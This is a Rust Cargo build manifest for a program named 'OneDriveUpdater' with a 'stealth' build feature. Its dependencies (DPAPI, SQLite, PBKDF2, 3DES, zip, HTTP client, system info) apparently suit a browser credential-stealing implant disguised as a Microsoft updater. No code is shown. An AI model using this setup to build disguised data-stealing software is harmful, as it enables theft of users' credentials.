[package]
name = "OneDriveUpdater"
version = "0.1.0"
edition = "2024"
[[bin]]
name = "OneDriveUpdater"
path = "src/main.rs"
required-features = ["stealth"]

# Debug build: console window visible, for local testing
[[bin]]
name = "OneDriveUpdater-debug"
path = "src/main.rs"

[features]
default = []
stealth = []

[dependencies]
reqwest = { version = "0.11", features = ["json", "blocking"] }
serde = { version = "1.0", features = ["derive"] }
serde_json = "1.0"
base64 = "0.13"
flate2 = "1.0"
rand = "0.8"
uuid = { version = "0.8", features = ["v4"] }
chrono = "0.4"
hostname = "0.3"
rsa = "0.9"
sha2 = "0.10"
aes-gcm = "0.10"
hex = "0.4"
sysinfo = "0.30"

[target.'cfg(windows)'.dependencies]
winreg = "0.52"
winapi = { version = "0.3", features = ["winuser", "errhandlingapi", "minwindef", "windef", "dpapi", "wincrypt", "winbase"] }
rusqlite = { version = "0.31", features = ["bundled"] }
pbkdf2 = { version = "0.12", features = ["hmac"] }
hmac = "0.12"
des = "0.8"
cbc = { version = "0.1", features = ["alloc"] }
cipher = "0.4"
sha1 = { version = "0.10", features = ["oid"] }
aes = "0.8"
zip = { version = "0.6", default-features = false, features = ["deflate"] }
